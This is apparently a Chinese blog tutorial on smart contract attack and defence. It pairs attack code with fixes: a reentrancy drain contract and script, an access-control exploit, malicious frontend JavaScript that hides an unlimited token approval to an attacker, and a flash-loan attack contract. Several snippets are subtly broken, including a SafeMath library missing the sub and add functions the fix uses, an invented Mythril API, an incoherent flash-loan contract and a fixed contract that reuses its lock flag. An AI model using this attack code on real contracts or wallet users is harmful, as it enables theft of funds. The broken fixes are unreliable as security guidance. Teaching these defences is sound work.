智能合约安全攻防演练:从理论到实战

原创 于 2025-07-30 07:45:00 发布 · 1k 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#智能合约 #安全 #python #区块链 #攻防 #密码学 #Echidna

目录

智能合约安全攻防演练:从理论到实战

1. 智能合约安全概述

智能合约安全是区块链开发的核心挑战。据SlowMist统计,2023年因智能合约漏洞造成的损失超过18亿美元。本演练将覆盖从基础漏洞到高级攻击手法的全频谱攻防技术,帮助开发者构建安全的DApp。

1.1 常见漏洞类型

漏洞类型占比典型案例损失金额
重入攻击23%The DAO$6000万
逻辑错误19%Parity多重签名$3000万
整数溢出15%BEC代币$1800万
访问控制12%Poly Network$6.1亿
前端攻击8%各类DEX-

2. 攻防环境搭建

2.1 工具栈配置

# 安装必备工具
npm install -g truffle ganache-cli 
pip install slither-analyzer mythril web3

# 安全工具集
git clone https://github.com/crytic/echidna.git
git clone https://github.com/ConsenSys/mythril-classic

2.2 测试链环境
攻击合约
本地Ganache
目标合约
防御合约
监控工具

3. 重入攻击攻防

3.1 攻击合约实现

// 恶意合约
contract ReentrancyAttack {
    address payable target;
    uint public count;

    constructor(address payable _target) {
        target = _target;
    }

    function attack() external payable {
        require(msg.value >= 1 ether);
        TargetContract(target).deposit{value: 1 ether}();
        TargetContract(target).withdraw();
    }

    receive() external payable {
        if (count < 5) {
            count++;
            TargetContract(target).withdraw();
        }
    }
}

// 漏洞合约
contract TargetContract {
    mapping(address => uint) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint balance = balances[msg.sender];
        (bool success, ) = msg.sender.call{value: balance}("");
        require(success);
        balances[msg.sender] = 0;
    }
}

3.2 防御方案

// 修复方案1: 检查-效果-交互模式
function safeWithdraw() external {
    uint balance = balances[msg.sender];
    balances[msg.sender] = 0; // 先更新状态
    (bool success, ) = msg.sender.call{value: balance}("");
    require(success);
}

// 修复方案2: 重入锁
bool private locked;

modifier noReentrant() {
    require(!locked, "No reentrancy");
    locked = true;
    _;
    locked = false;
}

function lockedWithdraw() external noReentrant {
    uint balance = balances[msg.sender];
    (bool success, ) = msg.sender.call{value: balance}("");
    require(success);
    balances[msg.sender] = 0;
}

3.3 攻击模拟脚本

const { ethers } = require("hardhat");

async function main() {
  const [owner, attacker] = await ethers.getSigners();
  
  const Target = await ethers.getContractFactory("TargetContract");
  const target = await Target.deploy();
  
  const Attack = await ethers.getContractFactory("ReentrancyAttack");
  const attack = await Attack.connect(attacker).deploy(target.address);
  
  console.log("初始合约余额:", await ethers.provider.getBalance(target.address));
  
  // 执行攻击
  await attack.connect(attacker).attack({ value: ethers.utils.parseEther("1") });
  
  console.log("攻击后合约余额:", await ethers.provider.getBalance(target.address));
  console.log("攻击者获利:", await ethers.provider.getBalance(attack.address));
}

main();

4. 整数溢出攻防

4.1 溢出漏洞示例

contract OverflowVulnerable {
    mapping(address => uint256) public balances;

    function batchTransfer(address[] memory recipients, uint256 value) public {
        uint256 total = recipients.length * value; // 可能溢出
        require(balances[msg.sender] >= total);
        
        balances[msg.sender] -= total;
        for (uint i = 0; i < recipients.length; i++) {
            balances[recipients[i]] += value;
        }
    }
}

4.2 防御方案

// 使用SafeMath库
library SafeMath {
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }
}

contract OverflowFixed {
    using SafeMath for uint256;
    mapping(address => uint256) public balances;

    function safeBatchTransfer(address[] memory recipients, uint256 value) public {
        uint256 total = recipients.length.mul(value); // 安全计算
        require(balances[msg.sender] >= total);
        
        balances[msg.sender] = balances[msg.sender].sub(total);
        for (uint i = 0; i < recipients.length; i++) {
            balances[recipients[i]] = balances[recipients[i]].add(value);
        }
    }
}

4.3 攻击检测脚本

from slither import Slither
from slither.detectors import all_detectors

def detect_overflow():
    slither = Slither("OverflowVulnerable.sol")
    for detector in all_detectors:
        det = detector(slither)
        for result in det.detect():
            print(f"漏洞类型: {result['check']}")
            print(f"位置: {result['source_mapping']}")
            print(f"描述: {result['description']}\n")

if __name__ == "__main__":
    detect_overflow()

5. 权限控制攻防

5.1 漏洞合约

contract AdminVulnerable {
    address public admin;
    uint public secretValue;

    constructor() {
        admin = msg.sender;
    }

    function setSecret(uint value) external {
        secretValue = value; // 无权限检查
    }
}

5.2 攻击与防御

// 攻击方式:直接调用setSecret
contract AttackAdmin {
    function exploit(address target) external {
        AdminVulnerable(target).setSecret(123);
    }
}

// 防御方案1: 修饰器检查
contract AdminFixed1 {
    address public admin;
    uint public secretValue;

    modifier onlyAdmin() {
        require(msg.sender == admin, "Not admin");
        _;
    }

    function setSecret(uint value) external onlyAdmin {
        secretValue = value;
    }
}

// 防御方案2: 多签控制
contract AdminFixed2 {
    address[] public admins;
    mapping(address => bool) public isAdmin;
    uint public secretValue;
    
    modifier onlyAdmin() {
        require(isAdmin[msg.sender], "Not admin");
        _;
    }

    function setSecret(uint value) external onlyAdmin {
        secretValue = value;
    }
}

5.3 权限检测工具

# 使用Slither检测权限问题
slither . --detect unprotected-upgrade
slither . --detect incorrect-equality

6. 前端攻击模拟

6.1 典型前端攻击

// 恶意前端代码
async function fakeApprove() {
  // 修改显示的代币数量
  document.getElementById('approveAmount').value = 1000;
  
  // 实际发送无限授权
  const tx = await tokenContract.approve(
    attackerAddress, 
    ethers.constants.MaxUint256
  );
  await tx.wait();
}

// 隐藏真实交易内容
function disguiseTransfer() {
  const realData = tokenContract.interface.encodeFunctionData('transfer', [
    attackerAddress, 
    ethers.utils.parseEther("1000")
  ]);
  
  // 显示为无害调用
  ui.showTransaction({
    to: tokenAddress,
    data: "0x123456..." // 错误数据
  });
}

6.2 防御方案

// 前端防御措施
function safeApprove() {
  // 显示完整交易详情
  const details = {
    contract: tokenAddress,
    method: "approve",
    spender: spenderAddress,
    amount: inputAmount
  };
  showTransactionDetails(details);

  // 二次确认
  const confirmed = await showConfirmationDialog(
    `将授权${spenderAddress}使用${inputAmount}代币`
  );
  if (!confirmed) return;

  // 使用限额而非无限授权
  const tx = await tokenContract.approve(
    spenderAddress,
    ethers.utils.parseEther(inputAmount)
  );
}

// 合约端防御
contract SafeToken {
  mapping(address => mapping(address => uint256)) private _allowances;

  function approve(address spender, uint256 amount) public returns (bool) {
    _approve(msg.sender, spender, amount);
    return true;
  }

  function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
    _approve(msg.sender, spender, _allowances[msg.sender][spender] + addedValue);
    return true;
  }

  function _approve(address owner, address spender, uint256 amount) internal {
    require(owner != address(0), "Approve from zero");
    require(spender != address(0), "Approve to zero");
    _allowances[owner][spender] = amount;
    emit Approval(owner, spender, amount);
  }
}

7. 闪电贷攻击模拟

7.1 攻击合约

interface IERC20 {
    function balanceOf(address) external returns (uint);
    function transfer(address, uint) external returns (bool);
    function approve(address, uint) external returns (bool);
}

interface IUniswapV2Pair {
    function swap(uint, uint, address, bytes calldata) external;
}

contract FlashLoanAttack {
    IUniswapV2Pair pair;
    IERC20 token;
    address owner;

    constructor(address _pair, address _token) {
        pair = IUniswapV2Pair(_pair);
        token = IERC20(_token);
        owner = msg.sender;
    }

    function attack(uint amount) external {
        // 触发闪电贷
        pair.swap(amount, 0, address(this), new bytes(1));
    }

    // Uniswap回调
    function uniswapV2Call(address, uint amount0, uint, bytes calldata) external {
        require(msg.sender == address(pair), "not pair");
        
        // 操纵价格
        token.transfer(address(pair), amount0 * 2); // 假设有套利空间
        
        // 归还贷款
        uint fee = (amount0 * 3) / 1000; // 0.3%费用
        token.transfer(address(pair), amount0 + fee);
        
        // 利润转给攻击者
        uint profit = token.balanceOf(address(this));
        token.transfer(owner, profit);
    }
}

7.2 防御方案

// 交易验证合约
contract TradeValidator {
    using SafeMath for uint;
    
    struct PoolReserves {
        uint reserve0;
        uint reserve1;
        uint timestamp;
    }
    
    mapping(address => PoolReserves) public reserves;
    uint public maxPriceImpact = 5; // 5%
    
    function validateSwap(
        address pool,
        uint amountIn,
        uint amountOutMin,
        address[] calldata path
    ) external view returns (bool) {
        PoolReserves memory r = reserves[pool];
        require(block.timestamp - r.timestamp < 60, "Stale reserves");
        
        // 计算预期输出
        uint expectedOut = (amountIn * r.reserve1) / r.reserve0;
        uint priceImpact = ((expectedOut - amountOutMin) * 100) / expectedOut;
        
        return priceImpact <= maxPriceImpact;
    }
    
    function updateReserves(
        address pool,
        uint reserve0,
        uint reserve1
    ) external {
        reserves[pool] = PoolReserves(reserve0, reserve1, block.timestamp);
    }
}

// 使用验证合约的DEX
contract SafeDEX {
    TradeValidator validator;
    
    constructor(address _validator) {
        validator = TradeValidator(_validator);
    }
    
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts) {
        require(validator.validateSwap(
            path[0], 
            amountIn, 
            amountOutMin, 
            path
        ), "Price impact too high");
        
        // 执行交换...
    }
}

8. 形式化验证实战

8.1 Echidna属性测试

// 测试合约
contract TestToken {
    ERC20 token;
    uint initialSupply;

    constructor() {
        token = new ERC20(1000);
        initialSupply = token.totalSupply();
    }

    // 属性1: 总供应量不变
    function test_totalSupply() public {
        assert(token.totalSupply() == initialSupply);
    }

    // 属性2: 余额总和等于总供应量
    function test_balanceSum(address addr1, address addr2) public {
        uint sum = token.balanceOf(addr1) + token.balanceOf(addr2);
        assert(sum <= token.totalSupply());
    }
}

// 运行测试
$ echidna-test TestToken.sol --contract TestToken

8.2 Mythril符号执行

from mythril import disassembler
from mythril.analysis import security
from mythril.analysis.report import Report

def analyze_contract():
    disassembly = disassembler.disassemble("VulnerableContract.sol")
    issues = security.fire_lasers(disassembly)
    
    report = Report()
    for issue in issues:
        report.append_issue(issue)
    
    print(report.as_text())

if __name__ == "__main__":
    analyze_contract()

9. 安全开发最佳实践

9.1 安全清单

  1. 输入验证

    • 检查所有外部输入
    • 使用SafeMath防止算术溢出
    • 验证地址不为零

  2. 状态管理

    • 遵循检查-效果-交互模式
    • 使用互斥锁防止重入
    • 避免复杂的状态转换

  3. 权限控制

    • 最小权限原则
    • 多签重要操作
    • 时间锁敏感操作

  4. 升级策略

    • 使用代理模式
    • 分开数据与逻辑
    • 测试升级路径

9.2 监控与响应
异常检测
暂停合约
事件分析
漏洞修复
升级部署
资金恢复

10. 综合攻防演练

10.1 靶场合约

// 包含多种漏洞的靶场合约
contract HackMe {
    mapping(address => uint) public balances;
    address public owner;
    bool public locked;
    
    constructor() payable {
        owner = msg.sender;
    }
    
    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }
    
    function withdraw() external {
        uint bal = balances[msg.sender];
        require(bal > 0);
        
        (bool sent, ) = msg.sender.call{value: bal}("");
        require(sent);
        
        balances[msg.sender] = 0;
    }
    
    function changeOwner(address _owner) external {
        require(msg.sender == owner);
        owner = _owner;
    }
    
    function unlock() external {
        require(!locked);
        locked = true;
    }
}

10.2 攻击任务

  1. 重入攻击:抽干合约资金
  2. 权限提升:获取owner权限
  3. 状态锁定:永久锁定合约

10.3 防御方案

contract FixedHackMe {
    using SafeMath for uint;
    mapping(address => uint) public balances;
    address public owner;
    bool public locked;
    uint public unlockTime;
    
    modifier onlyOwner() {
        require(msg.sender == owner, "Not owner");
        _;
    }
    
    modifier noReentrant() {
        require(!locked, "Locked");
        locked = true;
        _;
        locked = false;
    }
    
    function withdraw() external noReentrant {
        uint bal = balances[msg.sender];
        require(bal > 0);
        
        balances[msg.sender] = 0;
        (bool sent, ) = msg.sender.call{value: bal}("");
        require(sent);
    }
    
    function changeOwner(address _owner) external onlyOwner {
        require(_owner != address(0));
        owner = _owner;
    }
    
    function setUnlockTime(uint _time) external onlyOwner {
        unlockTime = _time;
    }
    
    function unlock() external {
        require(block.timestamp >= unlockTime);
        locked = false;
    }
}

11. 自动化安全工具集成

11.1 CI/CD安全流程
代码提交
静态分析
单元测试
形式化验证
部署测试网
监控警报

11.2 GitHub Action示例

name: Smart Contract Security
on: [push, pull_request]

jobs:
  security-check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      
      - name: Run Slither
        uses: crytic/slither-action@v0.2.0
        with:
          target: 'contracts/'
          args: '--exclude-informational'
      
      - name: Run Mythril
        run: |
          pip install mythril
          myth analyze contracts/*.sol --max-depth 10
          
      - name: Run Echidna
        run: |
          wget https://github.com/crytic/echidna/releases/download/v2.0.0/echidna-test-2.0.0-Ubuntu-18.04.tar.gz
          tar -xf echidna-test-2.0.0-Ubuntu-18.04.tar.gz
          ./echidna-test test/TestToken.sol --contract TestToken

12. 结论与进阶资源

12.1 关键安全原则

  1. 最小特权:合约只拥有必要权限
  2. 深度防御:多层安全措施
  3. 简单设计:减少攻击面
  4. 持续监控:实时异常检测
  5. 应急计划:暂停/升级机制

12.2 推荐资源

资源类型推荐内容
学习平台Solidity by Example, Ethernaut
工具集Slither, Mythril, Echidna
标准库OpenZeppelin Contracts
漏洞数据库SWC Registry, Rekt News
审计报告ConsenSys Diligence, Trail of Bits

“安全不是产品,而是过程。它需要持续的关注和适应不断变化的威胁环境。” - Bruce Schneier

通过本演练,您已掌握智能合约安全的核心攻防技术。建议定期:

  1. 参加CTF比赛(如Capture The Ether)
  2. 研究最新漏洞报告
  3. 进行同行代码审查
  4. 更新工具链知识
  5. 模拟红蓝对抗演练

持续的安全意识和技术更新是保障区块链项目安全的关键。

区块链安全靶场全面解析:助你掌握智能合约安全实战技能
weixin_47075747的博客
08-30 1905
区块链技术和智能合约的发展推动了去中心化应用(DApps)的蓬勃兴起,同时也带来了新的安全挑战。对于希望进入区块链安全领域的大学生或刚起步的开发者而言,掌握智能合约安全知识和技能是不可或缺的。本文将介绍几款知名的区块链安全靶场,并分析其特点、优点及适用对象,帮助读者更有效地提升实战能力。介绍Ethernaut是由知名区块链安全公司推出的智能合约安全靶场,设计了多层次的解谜式挑战,每个关卡对应一种常见的智能合约漏洞。玩家需要阅读并理解智能合约代码,通过找到代码中的漏洞来破解合约。
智能合约安全攻防:深入探索Smart-Contract-Hacking
gitblog_00038的博客
05-31 482
智能合约安全攻防:深入探索Smart-Contract-Hacking 去发现同类优质开源项目:https://gitcode.com/ 在区块链技术如火如荼发展的今天,智能合约成为了连接现实世界与去中心化世界的桥梁。然而,随着其重要性的提升,智能合约安全问题也日益凸显。针对这一领域,《Smart-Contract-Hacking》项目应运而生,它是学习和实践智能合约安全审计的宝贵资源库。 项目...
我与红队:一场网络安全实战的较量与成长
2401_89294392的博客
03-17 653
一、团队建设实践经验1.1人才储备方面1.2武器储备方面1.3绩效考核方面1.4团队协作方面二、红队成员核心能力2.1情报搜集人员2.2打点实施人员2.3漏洞挖掘及工具开发人员2.4社工钓鱼人员2.5内网渗透人员三、红队快速上分若干技巧3.1完整读一遍攻击方手册3.2手里有0day交还是不交3.3关注历史遗留webshell3.4与裁判保持良好的沟通四、经典案例4.1某大型金融企业集团4.1.1子公司供应链迂回打点4.1.2与蓝队反复对抗4.1.3社工钓鱼4.1.4内网横向渗透4.2某国有上市高新技术企业。
从“小白”到专家:网络安全从业者的进阶之路
m0_71322636的博客
05-13 660
参与NIST后量子密码算法标准化。
2025年社交APP安全防御指南:抵御DDoS与CC攻击的实战策略
2403_86962125的博客
05-09 869
2025年,社交APP的用户规模与业务复杂度持续增长,但随之而来的DDoS与CC攻击也愈发隐蔽和智能化。:通过白山云、上海云盾等T级高防CDN隐藏真实IP,结合Anycast技术将攻击流量分流至全球清洗节点,清洗效率达95%。:某头部社交APP在线上活动期间遭遇混合攻击(HTTP Flood+CC),峰值流量5Tbps,导致80%用户无法访问。某平台通过沙盒认证后防御效率提升30%。
鱼哥赠书活动第①期:《脑洞大开:透测试另类实战攻略》《Kali Linux高级渗透测试》《CTF实战:技术、解题与进阶》《构建新型网络形态下的网络空间安全体系》
Aluxian_的博客
09-21 3614
近年来,网络空间安全作为国家安全保障需求,被提升到了一个全新的战略高度,“没有网络安全,就没有国家安全”的政策理念也越发深入人心。网络安全行业正在经历前所未有的蓬勃发展和技术巨变,但随之而来的却是安全行业人才稀缺的尴尬现状。究其原因,主要在于网络安全是一门需要通过长期实战演练获得经验并进一步提升技能的技术,目前无论是高校,还是与国内安全相关的网络资源,受限于各种原因,大多还停留在学术教育以及概念普及的阶段,从而导致“入门”到“入行”之间存在着较大的鸿沟。《脑洞大开:渗透测试另类实战攻略》应运而生。
公链开发全攻略:从0到1构建区块链操作系统的技术远征
2501_91377248的博客
04-15 1051
公链开发始于对未来的“预言”。1. 定位“不可能三角”平衡点是去中心化优先(如比特币)打造抗审查网络,还是牺牲部分去中心化换取高性能(如Solana)?在“可扩展性-安全性-去中心化”三角中,每个公链都在书写自己的“宪法”。2. 设计经济模型通证分配机制(如预挖、挖矿、ICO)、交易费用模型(如EOS的零手续费)和治理代币设计,直接影响生态激励结构。Filecoin的存储挖矿模型,便重塑了分布式存储经济的规则。3. 生态愿景规划。
2025年API安全防御全解析:应对DDoS与CC攻击的智能策略
2403_86962125的博客
05-09 1051
2025年,企业需以技术为核心,拥抱合规与协作,方能在攻防博弈中掌控主动权。生成式AI模拟真实用户操作轨迹(如登录间隔、API调用逻辑),攻击流量与正常流量差异率低至0.5%,传统规则引擎难以检测。攻击时长压缩至分钟级,5分钟“闪击战”占比超60%,攻击者通过物联网僵尸网络发起分布式打击,企业应急响应时间窗口大幅缩短。:某头部支付平台在促销期间遭遇混合攻击(HTTP Flood+CC),峰值流量4.8Tbps,支付接口瘫痪12小时。建立行业安全白名单,对合规企业提供网络安全保险,分散因攻击导致的经营风险。
前沿对话 | 深育大讲堂之CTFer向攻防实战场景的进阶
sangfor_edu的博客
06-06 712
CTF竞赛经验分享
安全客2020季刊第三季:新基建___国计民生下的工控攻防升级.pdf
08-11
黑产趋势变化:从自动化工具作弊到真人众包作恶 VK-WAF 工作实践总结 电商隐私号的技术落地 SOAR 入门级调研 安全研究 污点传递理论在 Webshell 检测中的应用——PHP 篇 情报界在对抗社交媒体干扰活动中的作用 使用 ...
网络安全思维脑图(多个领域)
09-14
它通常包括基础理论、工具使用、实战演练等层次,确保全面掌握各个领域的核心技能。 通过学习上述各领域的知识,并结合"高清安全思维脑图",学习者可以构建一个全面的网络安全知识体系,增强识别和应对安全威胁的...
安全防护」4-DDoS的灾难性攻击解析与应对 - Artyom Gavrichenkov(中文)【可公开】 - 安全意识
12-04
同时,与专业安全公司合作,参与攻防靶场演练,可以提升团队的应急响应能力,提高实战中的防御水平。 区块链技术虽然主要应用于加密货币和智能合约,但也在网络安全领域展现出潜力。例如,区块链的去中心化特性可以...
天镜与网络安全策略:实战案例分析与最佳实践
本文全面介绍天镜系统的概念、架构和实战应用,并结合网络安全的重要性和策略基础,分析了网络威胁的分类与识别以及安全策略的基本原则。文章还探讨了防御措施在实际中的应用,包括防火墙、入侵检测系统和加密技术等...
以太坊十年:智能合约与去中心化的崛起
最新发布
知识的共享,拓宽视野,深化思考,获得新的启发.
07-29 116
在短短的几年内,以太坊不仅成为了去中心化应用和智能合约的主导平台,而且也见证了区块链技术和应用的多次重大革命。本文详细回顾了自2016年至今,以太坊生态所经历的几个关键时刻与技术浪潮,包括DAO事件、ICO热潮、DeFi的崛起、NFT市场的兴起,Layer 2技术和跨链解决方案,以及对数据隐私和计算的关注。目录:起源与创世(2013–2015)Vitalik Buterin 提出以太坊概念、基金会成立、主网上线危机与泡沫(2016–2018)
Chainlink Functions:为智能合约插上连接现实世界的翅膀
十年运维开发经验的王义杰在此分享自己的知识和经验
07-27 956
Chainlink Functions从根本上解决了区块链与现实世界的数据孤岛问题。它不仅仅是一个数据预言机,更是一个可编程的、去中心化的计算层。通过赋予智能合约访问任何API和执行自定义链下计算的能力,它为开发者打开了一个充满想象力的世界。
Zama+OpenZeppelin:将机密智能合约带入 DeFi 和数字资产领域
[email protected]
07-26 787
Zama+OpenZeppelin:将机密智能合约带入 DeFi 和数字资产领域
Ika Network 正式发布,让 Sui 智能合约可管理跨链资产
Sui_Network的博客
07-29 551
Ika 构建在 Sui 的高性能架构之上,使 Sui 成为去中心化跨链协调的指挥中心。
DAO组织智能合约开发:从理论到实践
qq_42568323的博客
07-27 715
摘要: DAO(去中心化自治组织)通过智能合约实现去中心化治理,核心组件包括治理代币、提案系统和链上金库。治理代币(ERC20扩展)管理投票权,提案系统涵盖提交、投票、执行全流程(状态机控制),需满足法定人数和通过阈值。典型实现包含成员管理、权限控制等模块,2023年DAO生态管理资产超200亿美元。开发需注重安全审计与透明设计。
点击劫持:潜藏在指尖的安全陷阱
fys15925190510的博客
07-27 957
随后,通过代码将这些恶意元素设置为全透明状态,并精准覆盖在用户可能点击的正常按钮上,如 “关闭广告”“查看详情” 等。在网页端,攻击者可能搭建一个看似正常的视频网站,当用户点击 “播放” 按钮时,透明的恶意元素会引导用户点击 “确认下载某软件”,而该软件实则为病毒或挖矿程序。例如,当用户在某款工具类 APP 中点击 “领取优惠券” 时,实际触发的是 “允许该应用发送付费短信” 的授权弹窗,导致手机被强制扣除话费。例如,点击后弹出带有随机验证码的确认框,或要求用户拖动滑块完成验证,确保操作是用户的真实意图。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

闲人编程

你的鼓励就是我最大的动力,谢谢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值